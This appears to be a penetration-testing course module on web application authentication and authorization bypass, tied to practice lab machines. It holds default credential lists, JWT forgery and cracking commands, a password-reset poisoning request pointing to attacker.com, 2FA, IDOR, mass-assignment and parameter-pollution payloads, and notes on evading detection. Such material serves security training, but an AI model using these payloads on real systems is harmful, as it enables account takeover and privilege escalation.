Back to All Modules

Application Bypass Techniques

#Overview

Application bypass techniques target authentication, authorization, and business logic flaws in web applications and APIs. Unlike CVE exploits that target known code vulnerabilities, these techniques exploit design flaws, weak implementation patterns, and insecure default configurations. They are commonly used to escalate privileges from low-privilege user to administrator, or to bypass multi-factor authentication controls.

#Prerequisites

  • BurpSuite or OWASP ZAP for intercepting and modifying HTTP requests
  • jwt_tool, jwt-cracker for JWT analysis
  • Custom scripts for automated parameter manipulation

#Techniques

#1. Default Credential Databases

Always test default credentials before attempting sophisticated attacks:

# Common web application defaults
# Jenkins:     (no auth by default), admin/admin
# Tomcat:      tomcat/tomcat, admin/admin
# phpMyAdmin:  root/(blank)
# WordPress:   admin/password
# Drupal:      admin/admin
# Joomla:      admin/admin
# TinyFileManager: admin/admin@123
BASH

Jeeves featured a Jenkins server without authentication. Tiny File Manager on Soccer used admin:admin@123.

#2. JWT Manipulation

JSON Web Tokens are common in API authentication and can be manipulated:

Algorithm Confusion ("alg": "none")

# Decode JWT: https://jwt.io or
echo "<jwt_token>" | cut -d '.' -f2 | base64 -d 2>/dev/null

# If server accepts "none" algorithm, modify header:
# {"alg":"none","typ":"JWT"}
# and remove the signature (keep trailing dot)
BASH

Test: python3 jwt_tool.py <token> -X a

JWT Key Cracking

python3 jwt_tool.py <token> -C -d /usr/share/wordlists/rockyou.txt
hashcat -m 16500 jwt_hash.txt /usr/share/wordlists/rockyou.txt
BASH

KID Injection

If the JWT header contains a kid (Key ID) parameter and the server reads keys from files, path traversal may allow arbitrary key selection:

{"alg":"HS256","typ":"JWT","kid":"../../../dev/null"}
JSON

Sign with an empty (or known) key.

#3. Password Reset Poisoning (Host Header Injection)

Manipulate the Host header in password reset requests to redirect the reset link to an attacker-controlled domain:

POST /forget-password HTTP/1.1
Host: attacker.com
...
email=victim@target.com
HTTP

If the application uses the Host header to construct the reset URL, the victim receives a link pointing to attacker.com containing the valid reset token.

#4. 2FA Bypass Techniques

# 1. Direct navigation after password login
GET /dashboard HTTP/1.1                    # Bypass 2FA page entirely

# 2. Response manipulation
# Change: {"2fa_required": true} to {"2fa_required": false}

# 3. Parameter removal
# Remove 2fa_code parameter from request body

# 4. Reuse old 2FA tokens
HTTP

#5. Race Conditions (TOCTOU)

Time-of-check to time-of-use vulnerabilities in authentication:

# Use turbo intruder or custom script to send parallel requests
# Example: coupon code reuse, file upload before extension check, transfer before balance check
BASH

Synchronize multiple requests to hit the application at the same time window.

#6. Business Logic Flaws

# Negative quantity for price manipulation
POST /cart/add HTTP/1.1
item_id=5&quantity=-1             # Reduce total price

# Excessive parameter submission
POST /api/user/update HTTP/1.1
username=victim&role=admin        # Mass assignment vulnerability
HTTP

#7. Insecure Direct Object References (IDOR)

GET /api/user/1234/profile               # Access your own profile
GET /api/user/1/profile                  # Try admin user ID (IDOR)
GET /api/invoice/2024-001                # Sequential ID enumeration
HTTP

#8. Parameter Pollution for Auth Bypass

# Duplicate parameters confuse parsers
POST /login HTTP/1.1
username=victim&password=wrong&password=right

# Array notation
username[0]=admin&password[admin]=test
HTTP

#Common Pitfalls

  • Warning: JWT "none" algorithm attacks only work if the server library explicitly allows it -- most modern libraries reject "none" by default
  • Warning: Host header injection requires the application to trust the Host header for URL generation -- test with actual valid emails to confirm
  • Warning: Rate limiting may block automated testing -- use delays between requests

#OPSEC Considerations

  • Shield: Repeated 401/403 responses are visible in application logs
  • Shield: Password reset poisoning generates emails that may alert users and SOC teams
  • Shield: IDOR enumeration creates sequential access patterns that anomaly detection can flag

#Post-Exploitation Value

  • Admin access to web applications provides data access and potential RCE through admin panels
  • JWT key compromise allows forging tokens for any user indefinitely
  • Password reset tokens may provide account takeover without any credential knowledge

#Cross-References

#Tool References

ToolLink
jwt_toolhttps://github.com/ticarpi/jwt_tool
BurpSuitehttps://portswigger.net/burp
OWASP ZAPhttps://www.zaproxy.org/

#Source Machines

  • Intentions (Hard, Linux) - API manipulation and auth bypass
  • Editorial (Easy, Linux) - Access control bypass